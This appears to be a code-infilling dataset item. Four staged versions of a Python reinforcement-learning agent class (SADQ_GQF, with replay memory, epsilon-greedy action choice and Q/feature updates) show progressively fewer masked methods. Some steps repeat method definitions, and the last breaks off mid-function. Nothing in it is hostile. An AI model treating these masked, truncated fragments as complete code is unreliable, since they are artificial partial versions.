"step-1": "<mask token>\n\n\nclass SADQ_GQF(object):\n <mask token>\n <mask token>\n\n def should_explore(self):\n self.epsilon = self.epsilon_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Epsilon' % self.name, scalar_value=\n self.epsilon, global_step=self.steps)\n return random.random() < self.epsilon\n\n def predict(self, state, isGreedy=False, is_random=False):\n if self.learning:\n self.steps += 1\n if (self.previous_state is not None and self.learning and self.\n current_reward is not None):\n state_crr = np.unique(state, axis=0)\n self.memory.add(self.previous_state, None, self.current_reward,\n state_crr.reshape(-1, self.state_length), 0, self.features)\n if self.learning and self.should_explore() and not isGreedy:\n q_values = None\n fv = None\n choice = random.choice(list(range(len(state))))\n action = choice\n else:\n with torch.no_grad():\n features_vector, q_values = self.eval_model.predict_batch(\n Tensor(state))\n q_values = FloatTensor(q_values).view(-1)\n _, choice = q_values.max(0)\n action = choice\n fv = features_vector[choice]\n if (self.learning and self.steps % self.reinforce_config.\n replace_frequency == 0):\n logger.debug('Replacing target model for %s' % self.name)\n if self.reinforce_config.replace_frequency != 1:\n self.target_model.replace(self.eval_model)\n else:\n self.target_model.replace_soft(self.eval_model)\n if (self.learning and self.steps > self.reinforce_config.\n update_start and self.steps % self.reinforce_config.\n update_steps == 0):\n self.update_time -= time.time()\n self.update()\n self.update_time += time.time()\n self.current_reward = 0\n self.previous_state = state[action]\n return choice, fv\n <mask token>\n <mask token>\n\n def end_episode(self, state):\n if not self.learning:\n return\n episode_time = time.time() - self.episode_time\n self.reward_history.append(self.total_reward)\n self.episode_time_history.append(episode_time)\n total_time = sum(self.episode_time_history)\n avg_time = total_time / len(self.episode_time_history)\n logger.info('End of Episode %d, Total reward %.2f, Epsilon %.2f' %\n (self.episode + 1, self.total_reward, self.epsilon))\n logger.debug(\n 'Episode Time: %.2fs (%.2fs), Prediction Time: %.2f, Update Time %.2f'\n % (episode_time, avg_time, self.prediction_time, self.update_time)\n )\n self.episode += 1\n self.summary.add_scalar(tag='%s/Episode Reward' % self.name,\n scalar_value=self.total_reward, global_step=self.episode)\n self.memory.add(self.previous_state, None, self.current_reward,\n state.reshape(-1, self.state_length), 1, self.features)\n self.save()\n self.reset()\n\n def reset(self):\n self.episode_time = time.time()\n self.current_reward = 0\n self.total_reward = 0\n self.previous_state = None\n self.previous_action = None\n self.prediction_time = 0\n self.update_time = 0\n self.features = None\n\n def restore_state(self):\n restore_path = self.network_config.network_path + '/adaptive.info'\n if self.network_config.network_path and os.path.exists(restore_path\n ) and self.memory_resotre:\n logger.info('Restoring state from %s' % self.network_config.\n network_path)\n with open(restore_path, 'rb') as file:\n info = pickle.load(file)\n self.steps = info['steps']\n self.episode = info['episode']\n self.memory.load(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n <mask token>\n <mask token>\n\n def passFeatures(self, features):\n self.features = features.copy()\n return\n\n def summary_test(self, reward, epoch):\n self.summary.add_scalar(tag='%s/eval reward' % self.name,\n scalar_value=reward, global_step=epoch * 40)\n <mask token>\n\n def update(self):\n if len(self.memory._storage) <= self.reinforce_config.batch_size:\n return\n beta = self.beta_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Beta' % self.name, scalar_value=\n beta, global_step=self.steps)\n if self.reinforce_config.use_prior_memory:\n batch = self.memory.sample(self.reinforce_config.batch_size, beta)\n (states, actions, reward, next_states, is_terminal, weights,\n batch_idxes) = batch\n self.summary.add_histogram(tag='%s/Batch Indices' % self.name,\n values=Tensor(batch_idxes), global_step=self.steps)\n else:\n batch = self.memory.sample(self.reinforce_config.batch_size)\n (states, actions, reward, next_states, is_terminal, features_vector\n ) = batch\n states = FloatTensor(states)\n terminal = FloatTensor([(1 if t else 0) for t in is_terminal])\n reward = FloatTensor(reward)\n features_vector = FloatTensor(features_vector)\n batch_index = torch.arange(self.reinforce_config.batch_size, dtype=\n torch.long)\n feature_values, q_values = self.eval_model.predict_batch(states)\n q_values = q_values.flatten()\n q_max = []\n f_max = []\n for i, ns in enumerate(next_states):\n feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns\n ).view(-1, self.state_length))\n q_value_max, idx = q_n.max(0)\n features_max = feature_n[idx]\n q_max.append(q_value_max)\n if self.network_config.version in ['v10', 'v11']:\n features_max[:, :3] = features_max[:, :3] * ns[idx, 65\n ] / states[i, 65]\n features_max[:, 3:6] = features_max[:, 3:6] * ns[idx, 66\n ] / states[i, 66]\n features_max[:, 6:9] = features_max[:, 6:9] * ns[idx, 63\n ] / states[i, 63]\n features_max[:, 9:12] = features_max[:, 9:12] * ns[idx, 64\n ] / states[i, 64]\n features_max[features_max == float('inf')] = 0\n f_max.append(features_max.view(-1))\n q_max = torch.stack(q_max, dim=1).view(-1)\n f_max = torch.stack(f_max)\n q_max = (1 - terminal) * q_max\n f_max = (1 - terminal.view(-1, 1)) * f_max\n q_target = reward + self.reinforce_config.discount_factor * q_max\n f_target = (features_vector + self.reinforce_config.discount_factor *\n f_max)\n if (torch.sum(feature_values != feature_values).item() + torch.sum(\n f_target != f_target)).item() > 0:\n f_target[f_target != f_target] = 0\n self.eval_model.fit(q_values, q_target, feature_values, f_target)\n if self.reinforce_config.use_prior_memory:\n td_errors = q_values - q_target\n new_priorities = torch.abs(td_errors) + 1e-06\n self.memory.update_priorities(batch_idxes, new_priorities.data)\n <mask token>\n <mask token>\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, new_feature_weights, new_q_weights):\n self.eval_model.feautre_model.load_state_dict(new_feature_weights)\n self.eval_model.q_model.load_state_dict(new_q_weights)\n",
"step-2": "<mask token>\n\n\nclass SADQ_GQF(object):\n <mask token>\n\n def __init__(self, name, state_length, network_config, reinforce_config,\n feature_len, combine_decomposed_func, is_sigmoid=False,\n memory_resotre=True):\n super(SADQ_GQF, self).__init__()\n self.name = name\n self.network_config = network_config\n self.reinforce_config = reinforce_config\n self.memory = ReplayBuffer_decom(self.reinforce_config.memory_size)\n self.learning = True\n self.explanation = False\n self.state_length = state_length\n self.features = 0\n self.feature_len = feature_len\n self.steps = 0\n self.reward_history = []\n self.episode_time_history = []\n self.best_reward_mean = -maxsize\n self.episode = 0\n self.feature_len = feature_len\n self.features = None\n self.reset()\n self.memory_resotre = memory_resotre\n reinforce_summary_path = (self.reinforce_config.summaries_path +\n '/' + self.name)\n if not self.network_config.restore_network:\n clear_summary_path(reinforce_summary_path)\n else:\n self.restore_state()\n self.summary = SummaryWriter(log_dir=reinforce_summary_path)\n self.eval_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.target_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.beta_schedule = LinearSchedule(self.reinforce_config.\n beta_timesteps, initial_p=self.reinforce_config.beta_initial,\n final_p=self.reinforce_config.beta_final)\n self.epsilon_schedule = LinearSchedule(self.reinforce_config.\n epsilon_timesteps, initial_p=self.reinforce_config.\n starting_epsilon, final_p=self.reinforce_config.final_epsilon)\n\n def should_explore(self):\n self.epsilon = self.epsilon_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Epsilon' % self.name, scalar_value=\n self.epsilon, global_step=self.steps)\n return random.random() < self.epsilon\n\n def predict(self, state, isGreedy=False, is_random=False):\n if self.learning:\n self.steps += 1\n if (self.previous_state is not None and self.learning and self.\n current_reward is not None):\n state_crr = np.unique(state, axis=0)\n self.memory.add(self.previous_state, None, self.current_reward,\n state_crr.reshape(-1, self.state_length), 0, self.features)\n if self.learning and self.should_explore() and not isGreedy:\n q_values = None\n fv = None\n choice = random.choice(list(range(len(state))))\n action = choice\n else:\n with torch.no_grad():\n features_vector, q_values = self.eval_model.predict_batch(\n Tensor(state))\n q_values = FloatTensor(q_values).view(-1)\n _, choice = q_values.max(0)\n action = choice\n fv = features_vector[choice]\n if (self.learning and self.steps % self.reinforce_config.\n replace_frequency == 0):\n logger.debug('Replacing target model for %s' % self.name)\n if self.reinforce_config.replace_frequency != 1:\n self.target_model.replace(self.eval_model)\n else:\n self.target_model.replace_soft(self.eval_model)\n if (self.learning and self.steps > self.reinforce_config.\n update_start and self.steps % self.reinforce_config.\n update_steps == 0):\n self.update_time -= time.time()\n self.update()\n self.update_time += time.time()\n self.current_reward = 0\n self.previous_state = state[action]\n return choice, fv\n\n def disable_learning(self, is_save=False):\n logger.info('Disabled Learning for %s agent' % self.name)\n if is_save:\n self.save(force=True)\n self.learning = False\n self.episode = 0\n\n def enable_learning(self):\n logger.info('enabled Learning for %s agent' % self.name)\n self.learning = True\n self.reset()\n\n def end_episode(self, state):\n if not self.learning:\n return\n episode_time = time.time() - self.episode_time\n self.reward_history.append(self.total_reward)\n self.episode_time_history.append(episode_time)\n total_time = sum(self.episode_time_history)\n avg_time = total_time / len(self.episode_time_history)\n logger.info('End of Episode %d, Total reward %.2f, Epsilon %.2f' %\n (self.episode + 1, self.total_reward, self.epsilon))\n logger.debug(\n 'Episode Time: %.2fs (%.2fs), Prediction Time: %.2f, Update Time %.2f'\n % (episode_time, avg_time, self.prediction_time, self.update_time)\n )\n self.episode += 1\n self.summary.add_scalar(tag='%s/Episode Reward' % self.name,\n scalar_value=self.total_reward, global_step=self.episode)\n self.memory.add(self.previous_state, None, self.current_reward,\n state.reshape(-1, self.state_length), 1, self.features)\n self.save()\n self.reset()\n\n def reset(self):\n self.episode_time = time.time()\n self.current_reward = 0\n self.total_reward = 0\n self.previous_state = None\n self.previous_action = None\n self.prediction_time = 0\n self.update_time = 0\n self.features = None\n\n def restore_state(self):\n restore_path = self.network_config.network_path + '/adaptive.info'\n if self.network_config.network_path and os.path.exists(restore_path\n ) and self.memory_resotre:\n logger.info('Restoring state from %s' % self.network_config.\n network_path)\n with open(restore_path, 'rb') as file:\n info = pickle.load(file)\n self.steps = info['steps']\n self.episode = info['episode']\n self.memory.load(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n <mask token>\n\n def reward(self, r):\n self.total_reward += r\n self.current_reward += r\n\n def passFeatures(self, features):\n self.features = features.copy()\n return\n\n def summary_test(self, reward, epoch):\n self.summary.add_scalar(tag='%s/eval reward' % self.name,\n scalar_value=reward, global_step=epoch * 40)\n <mask token>\n\n def update(self):\n if len(self.memory._storage) <= self.reinforce_config.batch_size:\n return\n beta = self.beta_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Beta' % self.name, scalar_value=\n beta, global_step=self.steps)\n if self.reinforce_config.use_prior_memory:\n batch = self.memory.sample(self.reinforce_config.batch_size, beta)\n (states, actions, reward, next_states, is_terminal, weights,\n batch_idxes) = batch\n self.summary.add_histogram(tag='%s/Batch Indices' % self.name,\n values=Tensor(batch_idxes), global_step=self.steps)\n else:\n batch = self.memory.sample(self.reinforce_config.batch_size)\n (states, actions, reward, next_states, is_terminal, features_vector\n ) = batch\n states = FloatTensor(states)\n terminal = FloatTensor([(1 if t else 0) for t in is_terminal])\n reward = FloatTensor(reward)\n features_vector = FloatTensor(features_vector)\n batch_index = torch.arange(self.reinforce_config.batch_size, dtype=\n torch.long)\n feature_values, q_values = self.eval_model.predict_batch(states)\n q_values = q_values.flatten()\n q_max = []\n f_max = []\n for i, ns in enumerate(next_states):\n feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns\n ).view(-1, self.state_length))\n q_value_max, idx = q_n.max(0)\n features_max = feature_n[idx]\n q_max.append(q_value_max)\n if self.network_config.version in ['v10', 'v11']:\n features_max[:, :3] = features_max[:, :3] * ns[idx, 65\n ] / states[i, 65]\n features_max[:, 3:6] = features_max[:, 3:6] * ns[idx, 66\n ] / states[i, 66]\n features_max[:, 6:9] = features_max[:, 6:9] * ns[idx, 63\n ] / states[i, 63]\n features_max[:, 9:12] = features_max[:, 9:12] * ns[idx, 64\n ] / states[i, 64]\n features_max[features_max == float('inf')] = 0\n f_max.append(features_max.view(-1))\n q_max = torch.stack(q_max, dim=1).view(-1)\n f_max = torch.stack(f_max)\n q_max = (1 - terminal) * q_max\n f_max = (1 - terminal.view(-1, 1)) * f_max\n q_target = reward + self.reinforce_config.discount_factor * q_max\n f_target = (features_vector + self.reinforce_config.discount_factor *\n f_max)\n if (torch.sum(feature_values != feature_values).item() + torch.sum(\n f_target != f_target)).item() > 0:\n f_target[f_target != f_target] = 0\n self.eval_model.fit(q_values, q_target, feature_values, f_target)\n if self.reinforce_config.use_prior_memory:\n td_errors = q_values - q_target\n new_priorities = torch.abs(td_errors) + 1e-06\n self.memory.update_priorities(batch_idxes, new_priorities.data)\n\n def load_model(self, model):\n self.eval_model.replace(model)\n <mask token>\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, new_feature_weights, new_q_weights):\n self.eval_model.feautre_model.load_state_dict(new_feature_weights)\n self.eval_model.q_model.load_state_dict(new_q_weights)\n",
"step-3": "<mask token>\n\n\nclass SADQ_GQF(object):\n <mask token>\n\n def __init__(self, name, state_length, network_config, reinforce_config,\n feature_len, combine_decomposed_func, is_sigmoid=False,\n memory_resotre=True):\n super(SADQ_GQF, self).__init__()\n self.name = name\n self.network_config = network_config\n self.reinforce_config = reinforce_config\n self.memory = ReplayBuffer_decom(self.reinforce_config.memory_size)\n self.learning = True\n self.explanation = False\n self.state_length = state_length\n self.features = 0\n self.feature_len = feature_len\n self.steps = 0\n self.reward_history = []\n self.episode_time_history = []\n self.best_reward_mean = -maxsize\n self.episode = 0\n self.feature_len = feature_len\n self.features = None\n self.reset()\n self.memory_resotre = memory_resotre\n reinforce_summary_path = (self.reinforce_config.summaries_path +\n '/' + self.name)\n if not self.network_config.restore_network:\n clear_summary_path(reinforce_summary_path)\n else:\n self.restore_state()\n self.summary = SummaryWriter(log_dir=reinforce_summary_path)\n self.eval_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.target_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.beta_schedule = LinearSchedule(self.reinforce_config.\n beta_timesteps, initial_p=self.reinforce_config.beta_initial,\n final_p=self.reinforce_config.beta_final)\n self.epsilon_schedule = LinearSchedule(self.reinforce_config.\n epsilon_timesteps, initial_p=self.reinforce_config.\n starting_epsilon, final_p=self.reinforce_config.final_epsilon)\n\n def should_explore(self):\n self.epsilon = self.epsilon_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Epsilon' % self.name, scalar_value=\n self.epsilon, global_step=self.steps)\n return random.random() < self.epsilon\n\n def predict(self, state, isGreedy=False, is_random=False):\n if self.learning:\n self.steps += 1\n if (self.previous_state is not None and self.learning and self.\n current_reward is not None):\n state_crr = np.unique(state, axis=0)\n self.memory.add(self.previous_state, None, self.current_reward,\n state_crr.reshape(-1, self.state_length), 0, self.features)\n if self.learning and self.should_explore() and not isGreedy:\n q_values = None\n fv = None\n choice = random.choice(list(range(len(state))))\n action = choice\n else:\n with torch.no_grad():\n features_vector, q_values = self.eval_model.predict_batch(\n Tensor(state))\n q_values = FloatTensor(q_values).view(-1)\n _, choice = q_values.max(0)\n action = choice\n fv = features_vector[choice]\n if (self.learning and self.steps % self.reinforce_config.\n replace_frequency == 0):\n logger.debug('Replacing target model for %s' % self.name)\n if self.reinforce_config.replace_frequency != 1:\n self.target_model.replace(self.eval_model)\n else:\n self.target_model.replace_soft(self.eval_model)\n if (self.learning and self.steps > self.reinforce_config.\n update_start and self.steps % self.reinforce_config.\n update_steps == 0):\n self.update_time -= time.time()\n self.update()\n self.update_time += time.time()\n self.current_reward = 0\n self.previous_state = state[action]\n return choice, fv\n\n def disable_learning(self, is_save=False):\n logger.info('Disabled Learning for %s agent' % self.name)\n if is_save:\n self.save(force=True)\n self.learning = False\n self.episode = 0\n\n def enable_learning(self):\n logger.info('enabled Learning for %s agent' % self.name)\n self.learning = True\n self.reset()\n\n def end_episode(self, state):\n if not self.learning:\n return\n episode_time = time.time() - self.episode_time\n self.reward_history.append(self.total_reward)\n self.episode_time_history.append(episode_time)\n total_time = sum(self.episode_time_history)\n avg_time = total_time / len(self.episode_time_history)\n logger.info('End of Episode %d, Total reward %.2f, Epsilon %.2f' %\n (self.episode + 1, self.total_reward, self.epsilon))\n logger.debug(\n 'Episode Time: %.2fs (%.2fs), Prediction Time: %.2f, Update Time %.2f'\n % (episode_time, avg_time, self.prediction_time, self.update_time)\n )\n self.episode += 1\n self.summary.add_scalar(tag='%s/Episode Reward' % self.name,\n scalar_value=self.total_reward, global_step=self.episode)\n self.memory.add(self.previous_state, None, self.current_reward,\n state.reshape(-1, self.state_length), 1, self.features)\n self.save()\n self.reset()\n\n def reset(self):\n self.episode_time = time.time()\n self.current_reward = 0\n self.total_reward = 0\n self.previous_state = None\n self.previous_action = None\n self.prediction_time = 0\n self.update_time = 0\n self.features = None\n\n def restore_state(self):\n restore_path = self.network_config.network_path + '/adaptive.info'\n if self.network_config.network_path and os.path.exists(restore_path\n ) and self.memory_resotre:\n logger.info('Restoring state from %s' % self.network_config.\n network_path)\n with open(restore_path, 'rb') as file:\n info = pickle.load(file)\n self.steps = info['steps']\n self.episode = info['episode']\n self.memory.load(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n\n def save(self, force=False, appendix=''):\n info = {'steps': self.steps, 'best_reward_mean': self.\n best_reward_mean, 'episode': self.episode}\n if (len(self.reward_history) >= self.network_config.save_steps and \n self.episode % self.network_config.save_steps == 0 or force):\n total_reward = sum(self.reward_history[-self.network_config.\n save_steps:])\n current_reward_mean = total_reward / self.network_config.save_steps\n if force:\n print('*************saved*****************',\n current_reward_mean, self.best_reward_mean)\n if not force:\n self.best_reward_mean = current_reward_mean\n logger.info('Saving network. Found new best reward (%.2f)' %\n total_reward)\n self.eval_model.save_network(appendix=appendix)\n self.target_model.save_network(appendix=appendix)\n with open(self.network_config.network_path +\n '/adaptive.info', 'wb') as file:\n pickle.dump(info, file, protocol=pickle.HIGHEST_PROTOCOL)\n self.memory.save(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n else:\n logger.info('The best reward is still %.2f. Not saving' %\n self.best_reward_mean)\n\n def reward(self, r):\n self.total_reward += r\n self.current_reward += r\n\n def passFeatures(self, features):\n self.features = features.copy()\n return\n\n def summary_test(self, reward, epoch):\n self.summary.add_scalar(tag='%s/eval reward' % self.name,\n scalar_value=reward, global_step=epoch * 40)\n\n def summary_GVFs_loss(self, loss, epoch):\n self.summary.add_scalar(tag='%s/GVFs loss' % self.name,\n scalar_value=loss, global_step=epoch * 40)\n\n def update(self):\n if len(self.memory._storage) <= self.reinforce_config.batch_size:\n return\n beta = self.beta_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Beta' % self.name, scalar_value=\n beta, global_step=self.steps)\n if self.reinforce_config.use_prior_memory:\n batch = self.memory.sample(self.reinforce_config.batch_size, beta)\n (states, actions, reward, next_states, is_terminal, weights,\n batch_idxes) = batch\n self.summary.add_histogram(tag='%s/Batch Indices' % self.name,\n values=Tensor(batch_idxes), global_step=self.steps)\n else:\n batch = self.memory.sample(self.reinforce_config.batch_size)\n (states, actions, reward, next_states, is_terminal, features_vector\n ) = batch\n states = FloatTensor(states)\n terminal = FloatTensor([(1 if t else 0) for t in is_terminal])\n reward = FloatTensor(reward)\n features_vector = FloatTensor(features_vector)\n batch_index = torch.arange(self.reinforce_config.batch_size, dtype=\n torch.long)\n feature_values, q_values = self.eval_model.predict_batch(states)\n q_values = q_values.flatten()\n q_max = []\n f_max = []\n for i, ns in enumerate(next_states):\n feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns\n ).view(-1, self.state_length))\n q_value_max, idx = q_n.max(0)\n features_max = feature_n[idx]\n q_max.append(q_value_max)\n if self.network_config.version in ['v10', 'v11']:\n features_max[:, :3] = features_max[:, :3] * ns[idx, 65\n ] / states[i, 65]\n features_max[:, 3:6] = features_max[:, 3:6] * ns[idx, 66\n ] / states[i, 66]\n features_max[:, 6:9] = features_max[:, 6:9] * ns[idx, 63\n ] / states[i, 63]\n features_max[:, 9:12] = features_max[:, 9:12] * ns[idx, 64\n ] / states[i, 64]\n features_max[features_max == float('inf')] = 0\n f_max.append(features_max.view(-1))\n q_max = torch.stack(q_max, dim=1).view(-1)\n f_max = torch.stack(f_max)\n q_max = (1 - terminal) * q_max\n f_max = (1 - terminal.view(-1, 1)) * f_max\n q_target = reward + self.reinforce_config.discount_factor * q_max\n f_target = (features_vector + self.reinforce_config.discount_factor *\n f_max)\n if (torch.sum(feature_values != feature_values).item() + torch.sum(\n f_target != f_target)).item() > 0:\n f_target[f_target != f_target] = 0\n self.eval_model.fit(q_values, q_target, feature_values, f_target)\n if self.reinforce_config.use_prior_memory:\n td_errors = q_values - q_target\n new_priorities = torch.abs(td_errors) + 1e-06\n self.memory.update_priorities(batch_idxes, new_priorities.data)\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, weight_dict):\n self.eval_model.load_weight(weight_dict)\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, new_feature_weights, new_q_weights):\n self.eval_model.feautre_model.load_state_dict(new_feature_weights)\n self.eval_model.q_model.load_state_dict(new_q_weights)\n",
"step-4": "import logging\nimport time\nimport random\nimport pickle\nimport os\nfrom sys import maxsize\nimport torch\nfrom tensorboardX import SummaryWriter\nfrom baselines.common.schedules import LinearSchedule\nfrom abp.utils import clear_summary_path\nfrom abp.models.feature_q_model import feature_q_model\nfrom abp.adaptives.common.prioritized_memory.memory_gqf import ReplayBuffer_decom\nimport numpy as np\nlogger = logging.getLogger('root')\nuse_cuda = torch.cuda.is_available()\nFloatTensor = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor\nLongTensor = torch.cuda.LongTensor if use_cuda else torch.LongTensor\nIntTensor = torch.cuda.IntTensor if use_cuda else torch.IntTensor\nByteTensor = torch.cuda.ByteTensor if use_cuda else torch.ByteTensor\nTensor = FloatTensor\n\n\nclass SADQ_GQF(object):\n \"\"\"Adaptive which uses the SADQ algorithm\"\"\"\n\n def __init__(self, name, state_length, network_config, reinforce_config,\n feature_len, combine_decomposed_func, is_sigmoid=False,\n memory_resotre=True):\n super(SADQ_GQF, self).__init__()\n self.name = name\n self.network_config = network_config\n self.reinforce_config = reinforce_config\n self.memory = ReplayBuffer_decom(self.reinforce_config.memory_size)\n self.learning = True\n self.explanation = False\n self.state_length = state_length\n self.features = 0\n self.feature_len = feature_len\n self.steps = 0\n self.reward_history = []\n self.episode_time_history = []\n self.best_reward_mean = -maxsize\n self.episode = 0\n self.feature_len = feature_len\n self.features = None\n self.reset()\n self.memory_resotre = memory_resotre\n reinforce_summary_path = (self.reinforce_config.summaries_path +\n '/' + self.name)\n if not self.network_config.restore_network:\n clear_summary_path(reinforce_summary_path)\n else:\n self.restore_state()\n self.summary = SummaryWriter(log_dir=reinforce_summary_path)\n self.eval_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.target_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.beta_schedule = LinearSchedule(self.reinforce_config.\n beta_timesteps, initial_p=self.reinforce_config.beta_initial,\n final_p=self.reinforce_config.beta_final)\n self.epsilon_schedule = LinearSchedule(self.reinforce_config.\n epsilon_timesteps, initial_p=self.reinforce_config.\n starting_epsilon, final_p=self.reinforce_config.final_epsilon)\n\n def should_explore(self):\n self.epsilon = self.epsilon_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Epsilon' % self.name, scalar_value=\n self.epsilon, global_step=self.steps)\n return random.random() < self.epsilon\n\n def predict(self, state, isGreedy=False, is_random=False):\n if self.learning:\n self.steps += 1\n if (self.previous_state is not None and self.learning and self.\n current_reward is not None):\n state_crr = np.unique(state, axis=0)\n self.memory.add(self.previous_state, None, self.current_reward,\n state_crr.reshape(-1, self.state_length), 0, self.features)\n if self.learning and self.should_explore() and not isGreedy:\n q_values = None\n fv = None\n choice = random.choice(list(range(len(state))))\n action = choice\n else:\n with torch.no_grad():\n features_vector, q_values = self.eval_model.predict_batch(\n Tensor(state))\n q_values = FloatTensor(q_values).view(-1)\n _, choice = q_values.max(0)\n action = choice\n fv = features_vector[choice]\n if (self.learning and self.steps % self.reinforce_config.\n replace_frequency == 0):\n logger.debug('Replacing target model for %s' % self.name)\n if self.reinforce_config.replace_frequency != 1:\n self.target_model.replace(self.eval_model)\n else:\n self.target_model.replace_soft(self.eval_model)\n if (self.learning and self.steps > self.reinforce_config.\n update_start and self.steps % self.reinforce_config.\n update_steps == 0):\n self.update_time -= time.time()\n self.update()\n self.update_time += time.time()\n self.current_reward = 0\n self.previous_state = state[action]\n return choice, fv\n\n def disable_learning(self, is_save=False):\n logger.info('Disabled Learning for %s agent' % self.name)\n if is_save:\n self.save(force=True)\n self.learning = False\n self.episode = 0\n\n def enable_learning(self):\n logger.info('enabled Learning for %s agent' % self.name)\n self.learning = True\n self.reset()\n\n def end_episode(self, state):\n if not self.learning:\n return\n episode_time = time.time() - self.episode_time\n self.reward_history.append(self.total_reward)\n self.episode_time_history.append(episode_time)\n total_time = sum(self.episode_time_history)\n avg_time = total_time / len(self.episode_time_history)\n logger.info('End of Episode %d, Total reward %.2f, Epsilon %.2f' %\n (self.episode + 1, self.total_reward, self.epsilon))\n logger.debug(\n 'Episode Time: %.2fs (%.2fs), Prediction Time: %.2f, Update Time %.2f'\n % (episode_time, avg_time, self.prediction_time, self.update_time)\n )\n self.episode += 1\n self.summary.add_scalar(tag='%s/Episode Reward' % self.name,\n scalar_value=self.total_reward, global_step=self.episode)\n self.memory.add(self.previous_state, None, self.current_reward,\n state.reshape(-1, self.state_length), 1, self.features)\n self.save()\n self.reset()\n\n def reset(self):\n self.episode_time = time.time()\n self.current_reward = 0\n self.total_reward = 0\n self.previous_state = None\n self.previous_action = None\n self.prediction_time = 0\n self.update_time = 0\n self.features = None\n\n def restore_state(self):\n restore_path = self.network_config.network_path + '/adaptive.info'\n if self.network_config.network_path and os.path.exists(restore_path\n ) and self.memory_resotre:\n logger.info('Restoring state from %s' % self.network_config.\n network_path)\n with open(restore_path, 'rb') as file:\n info = pickle.load(file)\n self.steps = info['steps']\n self.episode = info['episode']\n self.memory.load(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n\n def save(self, force=False, appendix=''):\n info = {'steps': self.steps, 'best_reward_mean': self.\n best_reward_mean, 'episode': self.episode}\n if (len(self.reward_history) >= self.network_config.save_steps and \n self.episode % self.network_config.save_steps == 0 or force):\n total_reward = sum(self.reward_history[-self.network_config.\n save_steps:])\n current_reward_mean = total_reward / self.network_config.save_steps\n if force:\n print('*************saved*****************',\n current_reward_mean, self.best_reward_mean)\n if not force:\n self.best_reward_mean = current_reward_mean\n logger.info('Saving network. Found new best reward (%.2f)' %\n total_reward)\n self.eval_model.save_network(appendix=appendix)\n self.target_model.save_network(appendix=appendix)\n with open(self.network_config.network_path +\n '/adaptive.info', 'wb') as file:\n pickle.dump(info, file, protocol=pickle.HIGHEST_PROTOCOL)\n self.memory.save(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n else:\n logger.info('The best reward is still %.2f. Not saving' %\n self.best_reward_mean)\n\n def reward(self, r):\n self.total_reward += r\n self.current_reward += r\n\n def passFeatures(self, features):\n self.features = features.copy()\n return\n\n def summary_test(self, reward, epoch):\n self.summary.add_scalar(tag='%s/eval reward' % self.name,\n scalar_value=reward, global_step=epoch * 40)\n\n def summary_GVFs_loss(self, loss, epoch):\n self.summary.add_scalar(tag='%s/GVFs loss' % self.name,\n scalar_value=loss, global_step=epoch * 40)\n\n def update(self):\n if len(self.memory._storage) <= self.reinforce_config.batch_size:\n return\n beta = self.beta_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Beta' % self.name, scalar_value=\n beta, global_step=self.steps)\n if self.reinforce_config.use_prior_memory:\n batch = self.memory.sample(self.reinforce_config.batch_size, beta)\n (states, actions, reward, next_states, is_terminal, weights,\n batch_idxes) = batch\n self.summary.add_histogram(tag='%s/Batch Indices' % self.name,\n values=Tensor(batch_idxes), global_step=self.steps)\n else:\n batch = self.memory.sample(self.reinforce_config.batch_size)\n (states, actions, reward, next_states, is_terminal, features_vector\n ) = batch\n states = FloatTensor(states)\n terminal = FloatTensor([(1 if t else 0) for t in is_terminal])\n reward = FloatTensor(reward)\n features_vector = FloatTensor(features_vector)\n batch_index = torch.arange(self.reinforce_config.batch_size, dtype=\n torch.long)\n feature_values, q_values = self.eval_model.predict_batch(states)\n q_values = q_values.flatten()\n q_max = []\n f_max = []\n for i, ns in enumerate(next_states):\n feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns\n ).view(-1, self.state_length))\n q_value_max, idx = q_n.max(0)\n features_max = feature_n[idx]\n q_max.append(q_value_max)\n if self.network_config.version in ['v10', 'v11']:\n features_max[:, :3] = features_max[:, :3] * ns[idx, 65\n ] / states[i, 65]\n features_max[:, 3:6] = features_max[:, 3:6] * ns[idx, 66\n ] / states[i, 66]\n features_max[:, 6:9] = features_max[:, 6:9] * ns[idx, 63\n ] / states[i, 63]\n features_max[:, 9:12] = features_max[:, 9:12] * ns[idx, 64\n ] / states[i, 64]\n features_max[features_max == float('inf')] = 0\n f_max.append(features_max.view(-1))\n q_max = torch.stack(q_max, dim=1).view(-1)\n f_max = torch.stack(f_max)\n q_max = (1 - terminal) * q_max\n f_max = (1 - terminal.view(-1, 1)) * f_max\n q_target = reward + self.reinforce_config.discount_factor * q_max\n f_target = (features_vector + self.reinforce_config.discount_factor *\n f_max)\n if (torch.sum(feature_values != feature_values).item() + torch.sum(\n f_target != f_target)).item() > 0:\n f_target[f_target != f_target] = 0\n self.eval_model.fit(q_values, q_target, feature_values, f_target)\n if self.reinforce_config.use_prior_memory:\n td_errors = q_values - q_target\n new_priorities = torch.abs(td_errors) + 1e-06\n 